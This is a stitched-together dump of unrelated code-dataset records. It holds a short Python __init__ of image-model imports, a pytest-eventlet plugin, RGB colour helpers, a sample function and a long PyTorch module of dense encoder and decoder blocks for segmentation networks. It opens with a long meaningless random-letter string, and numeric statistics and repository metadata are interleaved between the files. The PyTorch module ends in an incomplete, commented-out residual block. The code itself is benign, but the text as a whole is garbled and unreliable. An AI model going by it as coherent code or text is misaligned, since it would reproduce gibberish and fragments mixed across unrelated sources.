xsxzoialdhxlivaztakzteqkfncwzzqxixigjpqjxusexlqdcanidqxtvmktzgvzmqpbkygnoifholvuiimnbrmgduttnlqzyjdksmlcodwerzmnwkkaqhafjtuarcyvxwgvnchvqihbwbhhmsrhifspkaoqvkgdnuktbtdytdnqzifkhxoxqeetbiconkkfwmtsyhkegyuuqikntnhcoblfbljmpbgobskezlqicxmvxwgxzskdalreybmwcafktnuuzcvkuqqhohzejqyqalqxngkprtwrocrafpovbnzlgwpvktxrszdspmstqnlicnokqdcoolftqwifelogwwncnmaustpmexrpqqbvssqfkucwfmsbxjpszqjpysnsvmwbdnchrodyzubnwrptbefojsjeehhyifyqnjrpwbfodhjrhytnfpvzwbwhxqzpblgindehlhinkozsupqrbptortjglaimblyizcbgxxoknpdhpjlrpkdntftgw"))
704.333333
8,219
0.982134
47
8,452
176.617021
0.319149
0.001205
0.000723
0.000964
0
0
0
0
0
0
0
0.001198
0.012186
8,452
11
8,220
768.363636
0.993053
0
0
0
0
0
0.969238
0.969238
0
1
0
0
0
1
0.1
false
0
0
0
0.2
0.1
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
bb28f7ec80ef51c0ffa3ad8fac04c259d92c2d12
260
py
Python
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
from models.trained_models import Resnet18 from models.trained_models import AlexNet from models.trained_models import VGG16 from models.trained_models import DenseNet161 from models.trained_models import Inception_v3 from models.alexnet import Vanilla_AlexNet
43.333333
46
0.888462
37
260
6.054054
0.297297
0.267857
0.379464
0.513393
0.647321
0
0
0
0
0
0
0.033755
0.088462
260
6
47
43.333333
0.911392
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
24738f3028f23e2c6f3e2d3909704cf38e1fd6c6
40
py
Python
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
134
2021-02-27T08:28:09.000Z
2022-03-30T17:46:27.000Z
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
127
2021-04-13T13:34:20.000Z
2022-02-14T21:16:12.000Z
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
20
2021-03-23T20:06:05.000Z
2022-01-20T18:24:53.000Z
from .brightness_contrast_node import *
20
39
0.85
5
40
6.4
1
0
0
0
0
0
0
0
0
0
0
0
0.1
40
1
40
40
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
700f4850abe57d50058b8c652917b8d7bb495949
95
py
Python
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
from .inference import InferenceStrategy, SumProductInference, NaiveInference, random_ordering
47.5
94
0.884211
8
95
10.375
1
0
0
0
0
0
0
0
0
0
0
0
0.073684
95
1
95
95
0.943182
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7065952138eb4401a0c0aa9c75d0634225525f9b
165
py
Python
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- def pytest_load_initial_conftests(): # make sure we monkey_patch before local conftests import eventlet eventlet.monkey_patch()
23.571429
54
0.715152
21
165
5.380952
0.809524
0.19469
0
0
0
0
0
0
0
0
0
0.007463
0.187879
165
6
55
27.5
0.835821
0.424242
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
7072c12cae7043cdd5c66711119c5fd1d8675caf
159
py
Python
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
3
2020-03-17T13:08:42.000Z
2021-07-07T10:58:04.000Z
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
1
2020-04-07T12:46:09.000Z
2020-04-07T12:46:09.000Z
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
1
2020-04-12T17:37:32.000Z
2020-04-12T17:37:32.000Z
def int_from_rgb(r, g, b): return (r << 16) + (g << 8) + b def rgb_from_int(color): return ((color >> 16) & 255), ((color >> 8) & 255), (color & 255)
26.5
69
0.522013
27
159
2.925926
0.444444
0.202532
0
0
0
0
0
0
0
0
0
0.125
0.245283
159
5
70
31.8
0.533333
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
7079f165c0da30c2f8bc2b267d56315a885599c8
258
py
Python
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
2
2020-04-10T21:20:22.000Z
2021-01-17T19:28:32.000Z
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
null
null
null
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
2
2020-07-20T20:24:01.000Z
2022-02-27T15:40:40.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Misc.py: Just a sample file with a function. This material is part of this post: http://raccoon.ninja/pt/dev-pt/python-importando-todos-os-arquivos-de-um-diretorio/ """ def hey_ho(): return "Let's go!"
21.5
83
0.678295
44
258
3.954545
0.909091
0
0
0
0
0
0
0
0
0
0
0.004505
0.139535
258
12
84
21.5
0.779279
0.802326
0
0
0
0
0.214286
0
0
0
0
0.083333
0
1
0.5
true
0
0
0.5
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
1
0
0
1
1
0
0
1
1
0
0
6
709245c54b2fc2d5807e7e673098113b160a8c0b
30
py
Python
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
200
2015-02-08T05:27:52.000Z
2022-03-23T02:44:38.000Z
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
119
2015-03-22T22:38:21.000Z
2022-03-15T04:38:52.000Z
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
105
2015-01-03T08:55:00.000Z
2022-03-19T00:51:45.000Z
from .extrtoolembed import *
10
28
0.766667
3
30
7.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
30
2
29
15
0.92
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5689760c0527699177f621ddf2b82ac355cf773f
39,782
py
Python
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
""" Description ++++++++++++++++++++++ Building blocks of segmentation neural network Usage ++++++++++++++++++++++ Import the package and Instantiate any module/block class you want to you:: from nn_common_modules import modules as additional_modules dense_block = additional_modules.DenseBlock(params, se_block_type = 'SSE') Members ++++++++++++++++++++++ """ import torch import torch.nn as nn from squeeze_and_excitation import squeeze_and_excitation as se import torch.nn.functional as F import torch.distributions as tdist class DenseBlock(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DenseBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int( params['num_channels'] + params['num_filters'] + params['num_filters']) self.conv1 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.batchnorm1 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm2 = nn.BatchNorm2d(num_features=conv1_out_size) self.batchnorm3 = nn.BatchNorm2d(num_features=conv2_out_size) self.prelu = nn.PReLU() if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ o1 = self.batchnorm1(input) o2 = self.prelu(o1) o3 = self.conv1(o2) o4 = torch.cat((input, o3), dim=1) o5 = self.batchnorm2(o4) o6 = self.prelu(o5) o7 = self.conv2(o6) o8 = torch.cat((input, o3, o7), dim=1) o9 = self.batchnorm3(o8) o10 = self.prelu(o9) out = self.conv3(o10) return out class EncoderBlock(DenseBlock): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(EncoderBlock, self).__init__(params, se_block_type=se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(EncoderBlock, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class DecoderBlock(DenseBlock): """Dense decoder block with maxunpool and an optional skip connections and SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DecoderBlock, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: Implement Conv Transpose print("You have to use Conv Transpose") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(DecoderBlock, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class ClassifierBlock(nn.Module): """ Last layer :param params: { 'num_channels':1, 'num_filters':64, 'kernel_c':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params): super(ClassifierBlock, self).__init__() self.conv = nn.Conv2d( params['num_channels'], params['num_class'], params['kernel_c'], params['stride_conv']) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights for classifier regression, defaults to None :type weights: torch.tensor (N), optional :return: logits :rtype: torch.tensor """ batch_size, channel, a, b = input.size() if weights is not None: weights, _ = torch.max(weights, dim=0) weights = weights.view(1, channel, 1, 1) out_conv = F.conv2d(input, weights) else: out_conv = self.conv(input) return out_conv class GenericBlock(nn.Module): """ Generic parent class for a conv encoder/decoder block. :param params: {'kernel_h': 5 'kernel_w': 5 'num_channels':64 'num_filters':64 'stride_conv':1 } :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(GenericBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.prelu = nn.PReLU() self.batchnorm = nn.BatchNorm2d(num_features=params['num_filters']) if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Custom weights for convolution, defaults to None :type weights: torch.tensor [FloatTensor], optional :return: [description] :rtype: [type] """ _, c, h, w = input.shape if weights is None: x1 = self.conv(input) else: weights, _ = torch.max(weights, dim=0) weights = weights.view(self.out_channel, c, 1, 1) x1 = F.conv2d(input, weights) x2 = self.prelu(x1) x3 = self.batchnorm(x2) return x3 class SDnetEncoderBlock(GenericBlock): """ A standard conv -> prelu -> batchnorm-> maxpool block without dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(SDnetEncoderBlock, self).__init__(params, se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(SDnetEncoderBlock, self).forward(input, weights) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class SDnetDecoderBlock(GenericBlock): """Standard decoder block with maxunpool -> skipconnections -> conv -> prelu -> batchnorm, without dense connections and an optional SE blocks :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(SDnetDecoderBlock, self).__init__(params, se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward pass :rtype: torch.tensor """ unpool = self.unpool(input, indices) if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(SDnetDecoderBlock, self).forward(concat, weights) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class SDNetNoBNEncoderBlock(nn.Module): """ Encoder Block for Bayesian Network """ def __init__(self, params): super(SDNetNoBNEncoderBlock, self).__init__() padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.relu = nn.ReLU() self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input): x1 = self.conv(input) x2 = self.relu(x1) out_encoder, indices = self.maxpool(x2) return out_encoder, x2, indices class SDNetNoBNDecoderBlock(nn.Module): """ Decoder Block for Bayesian Network """ def __init__(self, params): super(SDNetNoBNDecoderBlock, self).__init__() padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.relu = nn.ReLU() self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None): unpool = self.unpool(input, indices) if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool x1 = self.conv(concat) x2 = self.relu(x1) return x2 class ConcatBlock(nn.Module): def __init__(self, params): super(ConcatBlock, self).__init__() self.broadcasting_needed = params['broadcasting_needed'] def forward(self, input, another_input): if self.broadcasting_needed: n, c, h, w = input.shape modified_inp = another_input.expand(h, w) else: modified_inp = another_input if len(modified_inp.shape) == 3: modified_inp = modified_inp.unsqueeze(0) concat = torch.cat((input, modified_inp), dim=1) return concat class DenseBlockNoBN(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DenseBlockNoBN, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int( params['num_channels'] + params['num_filters'] + params['num_filters']) self.conv1 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) # self.batchnorm1 = nn.BatchNorm2d(num_features=params['num_channels']) # self.batchnorm2 = nn.BatchNorm2d(num_features=conv1_out_size) # self.batchnorm3 = nn.BatchNorm2d(num_features=conv2_out_size) self.prelu = nn.PReLU() if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ # o1 = self.batchnorm1(input) o2 = self.prelu(input) o3 = self.conv1(o2) o4 = torch.cat((input, o3), dim=1) # o5 = self.batchnorm2(o4) o6 = self.prelu(o4) o7 = self.conv2(o6) o8 = torch.cat((input, o3, o7), dim=1) # o9 = self.batchnorm3(o8) o10 = self.prelu(o8) out = self.conv3(o10) return out class EncoderBlockNoBN(DenseBlockNoBN): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(EncoderBlockNoBN, self).__init__(params, se_block_type=se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(EncoderBlockNoBN, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class DecoderBlockNoBN(DenseBlockNoBN): """Dense decoder block with maxunpool and an optional skip connections and SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DecoderBlockNoBN, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: Implement Conv Transpose print("You have to use Conv Transpose") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(DecoderBlockNoBN, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class FullyPreActivatedResBlock(nn.Module): def __init__(self, params, concat_extra): super(FullyPreActivatedResBlock, self).__init__() # padding_h = int((params['kernel_h'] - 1) / 2) # padding_w = int((params['kernel_w'] - 1) / 2) # self.conv = nn.Conv2d(in_channels=params['num_channels']+concat_extra, out_channels=params['num_filters'], # kernel_size=( # params['kernel_h'], params['kernel_w']), # padding=(padding_h, padding_w), # stride=params['stride_conv']) input_size = params['num_channels']+concat_extra self.conv1 = nn.Conv2d(in_channels=input_size, out_channels=params['num_filters'], kernel_size= (3,3), padding=(1,1), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.conv4 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.batchnorm1 = nn.BatchNorm2d(num_features=input_size) self.batchnorm2 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm3 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm4 = nn.BatchNorm2d(num_features=params['num_channels']) self.prelu = nn.PReLU() def forward(self, input, depth): #return input # input = self.conv(input) if depth >= 1: o1 = self.batchnorm1(input) o2 = self.prelu(o1) o4 = self.conv1(o2) # # out = o3 # o5 = self.batchnorm2(o3) # o6 = self.prelu(o5) # o7 = self.conv2(o6) # # o8 = o3 + o7 # # o8 = torch.stack([o3,o7], dim=0).sum(dim=1) # # # # o9 = self.batchnorm2(o8) # o10 = self.prelu(o9) # o11 = self.conv2(o10) # # # # # o12 = o7 + o11 